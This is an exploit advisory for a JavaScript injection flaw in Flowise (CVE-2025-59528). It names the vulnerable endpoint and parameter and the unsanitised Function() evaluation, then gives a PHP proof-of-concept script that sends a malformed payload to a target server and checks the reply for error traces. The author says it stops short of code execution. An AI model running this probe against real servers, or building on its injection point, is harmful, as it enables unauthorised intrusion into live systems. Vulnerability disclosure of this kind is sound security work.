Flowise 3.0.6 JS Parsing Injection

Flowise 3.0.6 JS Parsing Injection

=============================================================================================================================================
| # Title Flowise 3.0.6 JS Parsing Injection

=============================================================================================================================================
| # Title : Flowise 3.0.6 JS Parsing Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://flowiseai.com/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/211933/ & CVE-2025-59528

[+] Summary :

A JavaScript Parsing Injection vulnerability exists in the following Flowise versions:

Affected: >= 2.2.7-patch.1 and < 3.0.6

Unauthenticated exploitation possible for versions < 3.0.1

Authentication required for versions >= 3.0.1

The vulnerability resides in the endpoint : /api/v1/node-load-method/customMCP

Flowise internally evaluates user input using: Function('return ' + inputString)()

This unsafe parsing mechanism allows a remote attacker to inject malformed JavaScript payloads, causing unexpected parsing behavior, syntax exceptions, stack traces, and other abnormal internal execution paths.

This report does NOT demonstrate RCE and does NOT execute system commands.
It focuses strictly on parsing injection as requested.

2. Vulnerability Description

The parameter: inputs.mcpServerConfig

is passed directly to a JavaScript interpreter via: Function("return " + input)

Because Flowise does not sanitize or validate the input, an attacker can supply a malformed or intentionally broken JavaScript object to force Flowise to:

Attempt to interpret the injected JavaScript

Generate SyntaxError, ReferenceError, or Unexpected token exceptions

Leak internal execution traces

Confirm the backend is evaluating untrusted JS strings

This behavior proves the system is vulnerable to JavaScript parsing injection.

3. Impact

Although this report intentionally excludes RCE, the underlying unsafe parsing mechanism could be chained with additional primitives depending on deployment context.

The confirmed impact here is:

JavaScript parsing injection

Potential denial of service via crafted parsing payloads

Internal error leakage

Strong indicator of further exploitable unsafe evaluation paths

This advisory documents only the safe, non-executing variant.

poc

<?php
/**
* Flowise JS Parsing Injection PoC by indoushka
* -------------------------------------------------
* Demonstrates unsafe JavaScript evaluation through controlled parsing failure.
*/

$target = "http://victim-flowise:3000/api/v1/node-load-method/customMCP";

// Malformed JS that forces the backend parser to reveal unsafe Function() behavior
$payload = '{x:(function(){ invalid_code_here++ })()}';

$data = [
"loadMethod" => "listActions",
"inputs" => [
"mcpServerConfig" => $payload
]
];

$options = [
"http" => [
"header" => "Content-Type: application/json\r\n",
"method" => "POST",
"content" => json_encode($data),
"timeout" => 6
]
];

echo "[*] Sending Parsing Injection Payload...\n";

$context = stream_context_create($options);
$response = @file_get_contents($target, false, $context);

echo "-----------------------------------\n";

if (!$response) {
echo "[!] Target did not respond.\n";
exit;
}

// Detection patterns
if (preg_match('/SyntaxError|ReferenceError|Unexpected|stack/i', $response)) {
echo "[+] Vulnerable: JS Parsing Injection confirmed.\n";
echo "[+] Evidence: Backend attempted to interpret injected JS.\n";
} else {
echo "[-] Not vulnerable or patched.\n";
}

echo "-----------------------------------\n";
echo "[*] Raw Response:\n$response\n";


Save as : poc.php

run : php poc.php


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================